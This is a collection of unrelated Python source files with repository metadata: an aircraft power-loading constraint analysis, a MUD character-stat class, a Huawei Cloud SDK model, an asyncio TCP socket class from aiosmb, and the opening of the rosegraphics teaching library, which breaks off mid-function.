00c6ded41b84008489a126a36657a8dc773626a5
/.history/Sizing_Method/ConstrainsAnalysis/ConstrainsAnalysisPD_20210712183638.py
3a1a9c53b9d9a89641bbb3d4af878f7d702672f8
[]
no_license
12libao/DEA
85f5f4274edf72c7f030a356bae9c499e3afc2ed
1c6f8109bbc18c4451a50eacad9b4dedd29682bd
refs/heads/master
2023-06-17T02:10:40.184423
2021-07-16T19:05:18
2021-07-16T19:05:18
346,111,158
0
0
null
null
null
null
UTF-8
Python
false
false
12,856
py
# author: Bao Li # # Georgia Institute of Technology # import sys import os sys.path.insert(0, os.getcwd()) import numpy as np import matplotlib.pylab as plt import Sizing_Method.Other.US_Standard_Atmosphere_1976 as atm import Sizing_Method.Aerodynamics.ThrustLapse as thrust_lapse import Sizing_Method.Aerodynamics.Aerodynamics as ad import Sizing_Method.ConstrainsAnalysis.ConstrainsAnalysis as ca from scipy.optimize import curve_fit """ The unit use is IS standard """ class ConstrainsAnalysis_Mattingly_Method_with_DP: """This is a power-based master constraints analysis""" def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, C_DR=0): """ :param beta: weight fraction :param Hp: P_motor/P_total :param n: number of motor :param K1: drag polar coefficient for 2nd order term :param K2: drag polar coefficient for 1st order term :param C_D0: the drag coefficient at zero lift :param C_DR: additional drag caused, for example, by external stores, braking parachutes or flaps, or temporary external hardware :return: power load: P_WTO """ self.h = altitude self.v = velocity self.rho = atm.atmosphere(geometric_altitude=self.h).density() self.beta = beta self.hp = Hp self.n = number_of_motor # power lapse ratio self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h, velocity=self.v).high_bypass_ratio_turbofan() self.k1 = ad.aerodynamics_without_pd(self.h, self.v).K1() self.k2 = ad.aerodynamics_without_pd(self.h, self.v).K2() self.cd0 = ad.aerodynamics_without_pd(self.h, self.v).CD_0() self.cdr = C_DR self.w_s = wing_load self.g0 = 9.80665 self.coefficient = (1 - self.hp) * self.beta * self.v / self.alpha # Estimation of ΔCL and ΔCD pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s) self.q = 0.5 * self.rho * self.v ** 2 self.cl = self.beta * self.w_s / self.q # print(self.cl) self.delta_cl = pd.delta_lift_coefficient(self.cl) self.delta_cd0 = pd.delta_CD_0() def master_equation(self, n, dh_dt, dV_dt): cl = self.cl * n + self.delta_cl cd = self.k1 * cl ** 2 + self.k2 * cl + self.cd0 + self.cdr + self.delta_cd0 p_w = self.coefficient * (self.q / (self.beta * self.w_s) * cd + dh_dt / self.v + dV_dt / self.g0) return p_w def cruise(self): p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=0, dV_dt=0) return p_w def climb(self, roc): p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0) return p_w def level_turn(self, turn_rate=3, v=100): """ assume 2 min for 360 degree turn, which is 3 degree/seconds assume turn at 300 knots, which is about 150 m/s """ load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5 p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=load_factor, dh_dt=0, dV_dt=0) return p_w def take_off(self): """ A320neo take-off speed is about 150 knots, which is about 75 m/s required runway length is about 2000 m K_TO is a constant greater than one set to 1.2 (generally specified by appropriate flying regulations) """ Cl_max_to = 2.3 # 2.3 K_TO = 1.2 # V_TO / V_stall s_G = 1266 p_w = 2 / 3 * self.coefficient / self.v * self.beta * K_TO ** 2 / ( s_G * self.rho * self.g0 * Cl_max_to) * self.w_s ** ( 3 / 2) return p_w def stall_speed(self, V_stall_to=65, Cl_max_to=2.3): V_stall_ld = 62 Cl_max_ld = 2.87 W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl) W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl) W_S = min(W_S_1, W_S_2) return W_S def service_ceiling(self, roc=0.5): p_w = ConstrainsAnalysis_Mattingly_Method_with_DP.master_equation(self, n=1, dh_dt=roc, dV_dt=0) return p_w allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb] class ConstrainsAnalysis_Gudmundsson_Method_with_DP: """This is a power-based master constraints analysis based on Gudmundsson_method""" def __init__(self, altitude, velocity, beta, wing_load, Hp=0.2, number_of_motor=12, e=0.75, AR=10.3): """ :param tau: power fraction of i_th power path :param beta: weight fraction :param e: wing planform efficiency factor is between 0.75 and 0.85, no more than 1 :param AR: wing aspect ratio, normally between 7 and 10 :return: power load: P_WTO """ self.h = altitude self.v = velocity self.beta = beta self.w_s = wing_load self.g0 = 9.80665 self.beta = beta self.hp = Hp self.n = number_of_motor self.rho = atm.atmosphere(geometric_altitude=self.h).density() # power lapse ratio self.alpha = thrust_lapse.thrust_lapse_calculation(altitude=self.h, velocity=self.v).high_bypass_ratio_turbofan() h = 2.43 # height of winglets b = 35.8 ar_corr = AR * (1 + 1.9 * h / b) # equation 9-88, If the wing has winglets the aspect ratio should be corrected self.k = 1 / (np.pi * ar_corr * e) self.coefficient = (1-self.hp) * self.beta * self.v / self.alpha # Estimation of ΔCL and ΔCD pd = ad.aerodynamics_with_pd(self.h, self.v, Hp=self.hp, n=self.n, W_S=self.w_s) self.q = 0.5 * self.rho * self.v ** 2 cl = self.beta * self.w_s / self.q self.delta_cl = pd.delta_lift_coefficient(cl) self.delta_cd0 = pd.delta_CD_0() # TABLE 3-1 Typical Aerodynamic Characteristics of Selected Classes of Aircraft cd_min = 0.02 cd_to = 0.03 cl_to = 0.8 self.v_to = 68 self.s_g = 1480 self.mu = 0.04 self.cd_min = cd_min + self.delta_cd0 self.cl = cl + self.delta_cl self.cd_to = cd_to + self.delta_cd0 self.cl_to = cl_to + self.delta_cl def cruise(self): p_w = self.q / self.w_s * (self.cd_min + self.k * self.cl ** 2) return p_w * self.coefficient def climb(self, roc): p_w = roc / self.v + self.q * self.cd_min / self.w_s + self.k * self.cl return p_w * self.coefficient def level_turn(self, turn_rate=3, v=100): """ assume 2 min for 360 degree turn, which is 3 degree/seconds assume turn at 100 m/s """ load_factor = (1 + ((turn_rate * np.pi / 180) * v / self.g0) ** 2) ** 0.5 q = 0.5 * self.rho * v ** 2 p_w = q / self.w_s * (self.cd_min + self.k * (load_factor / q * self.w_s + self.delta_cl) ** 2) return p_w * self.coefficient def take_off(self): q = self.q / 2 p_w = self.v_to ** 2 / (2 * self.g0 * self.s_g) + q * self.cd_to / self.w_s + self.mu * ( 1 - q * self.cl_to / self.w_s) return p_w * self.coefficient def service_ceiling(self, roc=0.5): vy = (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 q = 0.5 * self.rho * vy ** 2 p_w = roc / vy + q / self.w_s * (self.cd_min + self.k * (self.w_s / q + self.delta_cl) ** 2) # p_w = roc / (2 / self.rho * self.w_s * (self.k / (3 * self.cd_min)) ** 0.5) ** 0.5 + 4 * ( # self.k * self.cd_min / 3) ** 0.5 return p_w * self.coefficient def stall_speed(self, V_stall_to=65, Cl_max_to=2.3): V_stall_ld = 62 Cl_max_ld = 2.87 W_S_1 = 1 / 2 * self.rho * V_stall_to ** 2 * (Cl_max_to + self.delta_cl) W_S_2 = 1 / 2 * self.rho * V_stall_ld ** 2 * (Cl_max_ld + self.delta_cl) W_S = min(W_S_1, W_S_2) return W_S allFuncs = [take_off, stall_speed, cruise, service_ceiling, level_turn, climb] if __name__ == "__main__": n = 100 w_s = np.linspace(100, 9000, n) constrains_name = ['take off', 'stall speed', 'cruise', 'service ceiling', 'level turn @3000m', 'climb @S-L', 'climb @3000m', 'climb @7000m'] constrains = np.array([[0, 68, 0.988], [0, 80, 1], [11300, 230, 0.948], [11900, 230, 0.78], [3000, 100, 0.984], [0, 100, 0.984], [3000, 200, 0.975], [7000, 230, 0.96]]) color = ['c', 'k', 'b', 'g', 'y', 'plum', 'violet', 'm'] label = ['feasible region with PD', 'feasible region with PD', 'feasible region Gudmundsson', 'feasible region without PD', 'feasible region without PD', 'feasible region Mattingly'] m = constrains.shape[0] p_w = np.zeros([2 * m, n]) for k in range(3): plt.figure(figsize=(12, 8)) for i in range(m): for j in range(n): h = constrains[i, 0] v = constrains[i, 1] beta = constrains[i, 2] if k == 0: problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j]) problem2 = ca.ConstrainsAnalysis_Gudmundsson_Method(h, v, beta, w_s[j]) plt.title(r'Constraint Analysis: $\bf{Gudmundsson-Method}$ - Normalized to Sea Level') elif k == 1: problem1 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j]) problem2 = ca.ConstrainsAnalysis_Mattingly_Method(h, v, beta, w_s[j]) plt.title(r'Constraint Analysis: $\bf{Mattingly-Method}$ - Normalized to Sea Level') else: problem1 = ConstrainsAnalysis_Gudmundsson_Method_with_DP(h, v, beta, w_s[j]) problem2 = ConstrainsAnalysis_Mattingly_Method_with_DP(h, v, beta, w_s[j]) plt.title(r'Constraint Analysis: $\bf{with}$ $\bf{DP}$ - Normalized to Sea Level') if i >= 5: p_w[i, j] = problem1.allFuncs[-1](problem1, roc=15 - 5 * (i - 5)) p_w[i + m, j] = problem2.allFuncs[-1](problem2, roc=15 - 5 * (i - 5)) else: p_w[i, j] = problem1.allFuncs[i](problem1) p_w[i + m, j] = problem2.allFuncs[i](problem2) if i == 1: l1a, = plt.plot(p_w[i, :], np.linspace(0, 250, n), color=color[i], label=constrains_name[i]) l1b, = plt.plot(p_w[i + m, :], np.linspace(0, 250, n), color=color[i], linestyle='--') if k != 2: l1 = plt.legend([l1a, l1b], ['with DP', 'without DP'], loc="upper right") else: l1 = plt.legend([l1a, l1b], ['Gudmundsson method', 'Mattingly method'], loc="upper right") else: plt.plot(w_s, p_w[i, :], color=color[i], label=constrains_name[i]) plt.plot(w_s, p_w[i + m, :], color=color[i], linestyle='--') # p_w[1, :] = 200 / (p_w[1, -1] - p_w[1, 20]) * (w_s - p_w[1, 2]) def func(x, a, b, c, d, e): return a + b*x + c*x**2 + d*x**3 + e*x**4 #return a * np.exp(b * x) + c if i == 1 or i == 1+m : xdata, ydata = p_w[i, :], np.linspace(0, 250, n) popt, _ = curve_fit(func, xdata, ydata) p_w[i, :] = func(w_s, popt[0], popt[1], popt[2], popt[3], popt[4]) #if k != 2: # p_w[1 + m, :] = 10 ** 10 * (w_s - p_w[1 + m, 2]) #else: # p_w[1 + m, :] = 200 / (p_w[1 + m, -1] - p_w[1 + m, 20]) * (w_s - p_w[1 + m, 2]) plt.fill_between(w_s, np.amax(p_w[0:m, :], axis=0), 200, color='b', alpha=0.25, label=label[k]) plt.fill_between(w_s, np.amax(p_w[m:2 * m, :], axis=0), 200, color='r', alpha=0.25, label=label[k + 3]) plt.xlabel('Wing Load: $W_{TO}$/S (N/${m^2}$)') plt.ylabel('Power-to-Load: $P_{SL}$/$W_{TO}$ (W/N)') plt.legend(bbox_to_anchor=(1.002, 1), loc="upper left") plt.gca().add_artist(l1) plt.xlim(100, 9000) plt.ylim(0, 200) plt.tight_layout() plt.grid() plt.show()
f2d88ede145a55a634404601a3248fdd20b69f0c
45de3aa97525713e3a452c18dcabe61ac9cf0877
/src/primaires/perso/stat.py
376ea04b6dc9b0fedb3545626465b19dc441e1d2
[ "BSD-3-Clause" ]
permissive
stormi/tsunami
95a6da188eadea3620c70f7028f32806ee2ec0d1
bdc853229834b52b2ee8ed54a3161a1a3133d926
refs/heads/master
2020-12-26T04:27:13.578652
2015-11-17T21:32:38
2015-11-17T21:32:38
25,606,146
0
0
null
null
null
null
UTF-8
Python
false
false
5,954
py
# -*-coding:Utf-8 -* # Copyright (c) 2010 LE GOFF Vincent # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # * Redistributions of source code must retain the above copyright notice, this # list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # * Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """Ce fichier contient la classe Stat, détaillée plus bas.""" from abstraits.obase import BaseObj from primaires.perso.exceptions.stat import * # Flags : NX = 0 # aucune exception ne sera levée I0 = 1 # lève une exception si strictement inférieure à 0 IE0 = 2 # lève une exception si inférieure ou égale à 0 SM = 4 # lève une exception si strictement supérieure au MAX SEM = 8 # lève une exception si supérieure ou égale au MAX class Stat(BaseObj): """Cette classe définit une stat (ou caractéristique). Les attributs d'une stat sont : nom -- son nom symbole -- son symbole (utile pour le prompt) defaut -- sa valeur par défaut, celle donnée à un joueur à sa création marge -- la marge maximale max -- une chaîne de caractère représentant une autre stat flags -- les flags indiquant quand une exception doit être levée parent -- le parent hébergeant les stats """ _nom = "stat" _version = 1 def __init__(self, nom, symbole, defaut, marge, max, flags=I0, parent=None): """Constructeur d'une stat. Elle prend les mêmes paramètres que ceux passés dans l'ordre, dans la configuration. Voir : ./cfg_stats.py """ BaseObj.__init__(self) self.nom = nom self.symbole = symbole self.defaut = defaut self.marge_min = 0 self.marge_max = marge self.nom_max = max self.flags = flags self.parent = parent # Valeurs self.__base = self.defaut self.__variable = 0 self.__max = None if self.parent and max: self.__max = getattr(self.parent, "_{}".format(max)) self._construire() def __getnewargs__(self): return ("", "", "", 0, "") def __repr__(self): return "<stat {}={}>".format(self.nom, self.courante) def __str__(self): return "{}={} (base={}, variable={}, max={})".format( self.nom, self.courante, self.base, self.variable, self.max) @property def base(self): return self.__base def _get_variable(self): return self.__variable def _set_variable(self, variable): self.__variable = variable variable = property(_get_variable, _set_variable) @property def max(self): max = self.__max if max: max = max.courante return max def _get_courante(self): return self.__base + self.__variable def _set_courante(self, courante): """C'est dans cette propriété qu'on change la valeur courante de la stat. On passe par une méthode 'set' qui fait le travail. """ self.set(courante, self.flags) courante = property(_get_courante, _set_courante) def set(self, courante, flags): """Modifie la stat courante. C'est dans cette méthode qu'on lève des exceptions en fonction des valeurs modifiées. NOTE IMPORTANTE: la valeur est modifiée quelque soit l'exception levée. L'exception est levée pour réagir à un certain comportement (par exemple, le joueur n'a plus de vitalité) mais elle n'empêchera pas la stat d'être modifiée. En revanche, on test bel et bien que la stat de base ne dépasse ni le max ni la marge. """ base = courante - self.__variable if self.parent and self.parent.parent and \ not self.parent.parent.est_immortel(): # Levée d'exceptions if base < 0 and flags & I0: self.__base = 0 raise StatI0 if base <= 0 and flags & IE0: self.__base = 0 raise StatIE0 if self.max and flags & SM and base > self.max: raise StatSM if self.max and flags & SEM and base >= self.max: raise StatSEM if base > self.marge_max: base = self.marge_max if base < self.marge_min: base = self.marge_min if self.max and base > self.max: base = self.max if self.parent and self.parent.parent and \ self.parent.parent.est_immortel() and self.max: base = self.max self.__base = base def __setattr__(self, nom, val): BaseObj.__setattr__(self, nom, val)
eebaf1cc5939bf3397f44b7abae4b3301b3f9927
f9d564f1aa83eca45872dab7fbaa26dd48210d08
/huaweicloud-sdk-cc/huaweicloudsdkcc/v3/model/update_network_instance_request_body.py
ccb6925b1dca4650bfa9c81651ceef569cd52c3e
[ "Apache-2.0" ]
permissive
huaweicloud/huaweicloud-sdk-python-v3
cde6d849ce5b1de05ac5ebfd6153f27803837d84
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
refs/heads/master
2023-09-01T19:29:43.013318
2023-08-31T08:28:59
2023-08-31T08:28:59
262,207,814
103
44
NOASSERTION
2023-06-22T14:50:48
2020-05-08T02:28:43
Python
UTF-8
Python
false
false
3,407
py
# coding: utf-8 import six from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization class UpdateNetworkInstanceRequestBody: """ Attributes: openapi_types (dict): The key is attribute name and the value is attribute type. attribute_map (dict): The key is attribute name and the value is json key in definition. """ sensitive_list = [] openapi_types = { 'network_instance': 'UpdateNetworkInstance' } attribute_map = { 'network_instance': 'network_instance' } def __init__(self, network_instance=None): """UpdateNetworkInstanceRequestBody The model defined in huaweicloud sdk :param network_instance: :type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance` """ self._network_instance = None self.discriminator = None self.network_instance = network_instance @property def network_instance(self): """Gets the network_instance of this UpdateNetworkInstanceRequestBody. :return: The network_instance of this UpdateNetworkInstanceRequestBody. :rtype: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance` """ return self._network_instance @network_instance.setter def network_instance(self, network_instance): """Sets the network_instance of this UpdateNetworkInstanceRequestBody. :param network_instance: The network_instance of this UpdateNetworkInstanceRequestBody. :type network_instance: :class:`huaweicloudsdkcc.v3.UpdateNetworkInstance` """ self._network_instance = network_instance def to_dict(self): """Returns the model properties as a dict""" result = {} for attr, _ in six.iteritems(self.openapi_types): value = getattr(self, attr) if isinstance(value, list): result[attr] = list(map( lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value )) elif hasattr(value, "to_dict"): result[attr] = value.to_dict() elif isinstance(value, dict): result[attr] = dict(map( lambda item: (item[0], item[1].to_dict()) if hasattr(item[1], "to_dict") else item, value.items() )) else: if attr in self.sensitive_list: result[attr] = "****" else: result[attr] = value return result def to_str(self): """Returns the string representation of the model""" import simplejson as json if six.PY2: import sys reload(sys) sys.setdefaultencoding("utf-8") return json.dumps(sanitize_for_serialization(self), ensure_ascii=False) def __repr__(self): """For `print`""" return self.to_str() def __eq__(self, other): """Returns true if both objects are equal""" if not isinstance(other, UpdateNetworkInstanceRequestBody): return False return self.__dict__ == other.__dict__ def __ne__(self, other): """Returns true if both objects are not equal""" return not self == other
6ff299c2cc6c8b9893253d3ebe9d3ea491400c72
60be3894ad491bde502b8f6909a026ee115d952e
/aiosmb/network/tcp.py
3da2e5cbc315e7cbcfde7804212c83c4942ef225
[]
no_license
topotam/aiosmb
7c97c6a9806c84a9fae28fa372cc6903fa6ec0c5
e2ece67bbf380f576b154b09ea5fd63d9b4ecf4c
refs/heads/master
2023-06-25T17:41:03.605226
2021-07-27T18:31:12
2021-07-27T18:31:12
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,676
py
import enum import asyncio from aiosmb import logger from aiosmb.commons.exceptions import * class TCPSocket: """ Generic asynchronous TCP socket class, nothing SMB related. Creates the connection and channels incoming/outgoing bytes via asynchonous queues. """ def __init__(self, socket = None, target = None): self.settings = target self.socket = socket #for future, if we want a custom soscket self.reader = None self.writer = None self.out_queue = asyncio.Queue() self.in_queue = asyncio.Queue() self.disconnected = asyncio.Event() self.incoming_task = None self.outgoing_task = None async def disconnect(self): """ Disconnects from the socket. Stops the reader and writer streams. """ if self.disconnected.is_set(): return if self.outgoing_task is not None: self.outgoing_task.cancel() if self.incoming_task is not None: self.incoming_task.cancel() if self.writer is not None: try: self.writer.close() except: pass self.writer = None self.reader = None self.disconnected.set() async def handle_incoming(self): """ Reads data bytes from the socket and dispatches it to the incoming queue """ try: lasterror = None msgsize = None while not self.disconnected.is_set(): try: data = await self.reader.readexactly(4) msgsize = int.from_bytes(data[1:], byteorder='big', signed = False) data = await self.reader.readexactly(msgsize) await self.in_queue.put( (data, None) ) if data == b'': return except asyncio.CancelledError as e: lasterror = e break except Exception as e: logger.debug('[TCPSocket] handle_incoming %s' % str(e)) lasterror = e break except asyncio.CancelledError: return except Exception as e: lasterror = e finally: if self.in_queue is not None: await self.in_queue.put( (None, lasterror) ) await self.disconnect() async def handle_outgoing(self): """ Reads data bytes from the outgoing queue and dispatches it to the socket """ try: while not self.disconnected.is_set(): data = await self.out_queue.get() self.writer.write(data) await self.writer.drain() except asyncio.CancelledError: #the SMB connection is terminating return except Exception as e: logger.exception('[TCPSocket] handle_outgoing %s' % str(e)) await self.disconnect() #async def connect(self, settings): #not needed parameter because we have networkselector now... async def connect(self): """ Main function to be called, connects to the target specified in settings, and starts reading/writing. """ #self.settings = settings try: con = asyncio.open_connection(self.settings.get_ip(), self.settings.get_port()) try: self.reader, self.writer = await asyncio.wait_for(con, int(self.settings.timeout)) except asyncio.TimeoutError: logger.debug('[TCPSocket] Connection timeout') raise SMBConnectionTimeoutException('[TCPSocket] Connection timeout') except ConnectionRefusedError: logger.debug('[TCPSocket] Connection refused') raise SMBConnectionRefusedException('[TCPSocket] Connection refused') except asyncio.CancelledError: #the SMB connection is terminating raise asyncio.CancelledError except Exception as e: logger.debug('[TCPSocket] connect generic exception') raise e self.incoming_task = asyncio.create_task(self.handle_incoming()) self.outgoing_task = asyncio.create_task(self.handle_outgoing()) return True, None except Exception as e: try: self.writer.close() except: pass return False, e
c61c925a0e0f9a7e7cfb8f89789e3bb008228a43
f55ea1cfc520e6e2ceda961e7400fe2de0ad4e69
/src/rosegraphics.py
c2138ca1fdd9002c0686a7fb42372f18f779db0e
[ "MIT" ]
permissive
chenx16/05b-Exam1Practice
231081cc1284ccdd27b1da57cd19bc656a648eb1
82dbe6a5677732820f32dbb8264c04a028a1a459
refs/heads/master
2020-04-09T20:15:08.721532
2018-12-12T19:01:54
2018-12-12T19:01:54
160,568,393
0
0
null
2018-12-05T19:31:56
2018-12-05T19:31:56
null
UTF-8
Python
false
false
65,517
py
""" rosegraphics.py - a simple Graphics library for Python. Its key feature is: -- USING this library provides a simple introduction to USING objects. Other key features include: -- It has a rich set of classes, methods and instance variables. -- In addition to classes like Circles that are natural for students, it has other kinds of classes like RoseWindow and FortuneTeller to provide a richer set of examples than "just" a graphics library. -- It allows one to do a reasonable set of graphics operations with reasonable efficiency. The API mimics Java's Shape API for the most part. -- It is built on top of tkinter and its extension ttk (the standard graphics libraries that come with Python). -- Unlike tkinter, it is NOT event-driven and hence can be used before students see that paradigm. (There is a behind-the-scenes facilty for listening for and responding to events, for those who want to do so.) -- It attempts to be as bullet-proof as possible, to make it easy for beginners to use it. In particular, it attempts to provide reasonable error messages when a student misuses the API. -- It was inspired by zellegraphics but is a complete re-implemenation that attempts to: -- Be more bullet-proof. -- Provide a richer set of examples for using objects. -- Have an API that is more like Java's Shape API than tkinter's (older) API. -- While it can serve as an example for defining classes, it is NOT intended to do so for beginners. It is excellent for helping students learn to USE objects; it is NOT perfect for helping students learn to WRITE CLASSES. See the MAIN function below for typical examples of its use. Authors: David Mutchler, Mark Hays, Michael Wollowswki, Matt Boutell, Chandan Rupakheti, Claude Anderson and their colleagues, with thanks to John Zelle for inspiration and hints. First completed version: September 2014. """ # FIXME (errors): # -- clone() does not really make a copy; it just makes a new one # but without cloning all the attributes. # -- _ShapeWithCenter claims that things like Ellipse are subclasses, # but they are not at this point, I think. In general, need to # deal with overlap between _ShapeWithCenter and _RectangularShape. # KEEP both of them to have some classes have corner_1 and corner_2 # while others have center and ... # FIXME (things that have yet to be implemented): # -- Allow multiple canvasses. # -- Better close_on ... ala zellegraphics. # -- Keyboard. # -- Better Mouse. # -- Add type hints. # -- Catch all Exceptions and react appropriately. # -- Implement unimplemented classes. # -- Add and allow FortuneTellers and other non-canvas classes. import tkinter from tkinter import font as tkinter_font import time import turtle # ---------------------------------------------------------------------- # All the windows that are constructed during a run share the single # _master_Tk (a tkinter.Tk object) # as their common root. The first construction of a RoseWindow # sets this _master_Tk to a Tkinter.Tk object. # ---------------------------------------------------------------------- _master_Tk = None # ---------------------------------------------------------------------- # At the risk of not being Pythonic, we provide a simple type-checking # facility that attempts to provide meaningful error messages to # students when they pass arguments that are not of the expected type. # ---------------------------------------------------------------------- class WrongTypeException(Exception): """ Not yet implemented. """ pass def check_types(pairs): """ Not yet implemented fully. """ for pair in pairs: value = pair[0] expected_type = pair[1] if not isinstance(value, expected_type): raise WrongTypeException(pair) # ---------------------------------------------------------------------- # Serialization facility # ---------------------------------------------------------------------- def _serialize_shapes(self): """Returns a list of strings representing the shapes in sorted order.""" # Idea: dump all the stats on all shapes, return a sorted list for easy comparison. # Problem: the order in which keys appear in dictionaries is random! # Solution: sort keys and manually print shapes = [shape.__dict__ for shape in self.initial_canvas.shapes] keys_by_shape = [sorted(shape) for shape in shapes] for k in range(len(shapes)): shapes[k]['_method_for_drawing'] = None shapes[k]['shape_id_by_canvas'] = None result = [] for k in range(len(keys_by_shape)): shape = shapes[k] result.append([]) for key in keys_by_shape[k]: result[-1].append(str(key) + ":" + str(shape[key])) result[-1] = str(result[-1]) return "\n".join(sorted(result)) # ---------------------------------------------------------------------- # RoseWindow is the top-level object. # It starts with a single RoseCanvas. # ---------------------------------------------------------------------- class RoseWindow(object): """ A RoseWindow is a window that pops up when constructed. It can have RoseWidgets on it and starts by default with a single RoseCanvas upon which one can draw shapes. To construct a RoseWindow, use: - rg.RoseWindow() or use any of its optional arguments, as in these examples: window = rg.RoseWindow(400, 300) # 400 wide by 300 tall window = rg.RoseWindow(400, 300, 'Funny window') # with a title Instance variables include: width: width of this window (in pixels) height: width of this window (in pixels) title: displayed on the window's bar widgets: the things attached to this window """ def __init__(self, width=400, height=300, title='Rose Graphics', color='black', canvas_color=None, make_initial_canvas=True): """ Pops up a tkinter.Toplevel window with (by default) a RoseCanvas (and associated tkinter.Canvas) on it. Arguments are: -- width, height: dimensions of the window (in pixels). -- title: title displayed on the windoww. -- color: background color of the window -- canvas_color: background color of the canvas displayed on the window by default -- make_initial_canvas: -- If True, a default canvas is placed on the window. -- Otherwise, no default canvas is placed on the window. If this is the first RoseWindow constructed, then a hidden Tk object is constructed to control the event loop. Preconditions: :type width: int :type height: int :type title: str :type color: Color :type canvas_color: Color :type make_initial_canvas: bool """ # check_types([(width, (int, float)), # (height, (int, float)), # (title, (Color, str) # -------------------------------------------------------------- # The _master_Tk controls the mainloop for ALL the RoseWindows. # If this is the first RoseWindow constructed in this run, # then construct the _master_Tk object. # -------------------------------------------------------------- global _master_Tk if not _master_Tk: _master_Tk = tkinter.Tk() _master_Tk.withdraw() else: time.sleep(0.1) # Helps the window appear on TOP of Eclipse # -------------------------------------------------------------- # Has a tkinter.Toplevel, and a tkinter.Canvas on the Toplevel. # -------------------------------------------------------------- self.toplevel = tkinter.Toplevel(_master_Tk, background=color, width=width, height=height) self.toplevel.title(title) self._is_closed = False self.toplevel.protocol("WM_DELETE_WINDOW", self.close) # FIXME: The next two need to be properties to have # setting happen correctly. Really belongs to RoseCanvas. # See comments elsewhere on this. self.width = width self.height = height if make_initial_canvas: self.initial_canvas = RoseCanvas(self, width, height, canvas_color) else: self.initial_canvas = None self.widgets = [self.initial_canvas] # FIXME: Do any other tailoring of the toplevel as desired, # e.g. borderwidth and style... # -------------------------------------------------------------- # Catch mouse clicks and key presses. # -------------------------------------------------------------- self.mouse = Mouse() self.keyboard = Keyboard() self.toplevel.bind('<Button>', self._on_mouse_click) self.toplevel.bind('<KeyPress>', self._on_key_press) self.update() def close(self): """ Closes this RoseWindow. """ if self.toplevel: self.toplevel.destroy() self.toplevel = None self.update() self._is_closed = True def update(self): """ Checks for and handles events that has happened in this RoseWindow (e.g. mouse clicks, drawing shapes). """ global _master_Tk _master_Tk.update() def render(self, seconds_to_pause=None): """ Updates all the Shapes attached to RoseCanvas objects associated with this RoseWindow, then draws all those Shapes. After doing so, pauses the given number of seconds. :type seconds_to_pause: float """ for widget in self.widgets: if type(widget) == RoseCanvas: widget.render() self.update() if seconds_to_pause: time.sleep(seconds_to_pause) def close_on_mouse_click(self): """ Displays a message at the bottom center of the window and waits for the user to click the mouse anywhere in the window. Then closes this RoseWindow. Returns an rg.Point that specifies where the user clicked the mouse. """ message = 'To exit, click anywhere in this window' click_position = self.continue_on_mouse_click(message=message, close_it=True) return click_position def continue_on_mouse_click(self, message='To continue, click anywhere in this window', x_position=None, y_position=None, close_it=False, erase_it=True): """ Displays a message at the bottom center of the window and waits for the user to click the mouse, then erases the message. Optional parameters let you: -- Display a different message -- Place the message at a different place in the window (xpos and ypos are as in Text) -- Close the window after the mouse is clicked (and ignore the GraphicsError that results if the user instead chooses to click the X in the window) -- NOT erase the message when done """ if self._is_closed: return if x_position is None: x_position = self.width / 2 if y_position is None: y_position = self.height - 20 anchor_point = Point(x_position, y_position) text = Text(anchor_point, message) # FIXME: Really should do all this on a per-RoseCanvas basis. if self.initial_canvas: text.attach_to(self.initial_canvas) self.initial_canvas._renderShape(text, render_NOW=True) click_position = self.get_next_mouse_click() if erase_it and self.initial_canvas: text.detach_from(self.initial_canvas) if close_it: self.close() # then close the window return click_position def get_next_mouse_click(self): """ Waits for the user to click in the window. Then returns the rg.Point that represents the point where the user clicked. Example: If this method is called and then the user clicks near the upper-right corner of a 300 x 500 window, this function would return something like rg.Point(295, 5). """ self.mouse.position = None while True: if self._is_closed: return None if self.mouse.position is not None: break self.update() time.sleep(.05) # allow time for other events to be handled click_point = self.mouse.position self.mouse.position = None return click_point def _on_mouse_click(self, event): 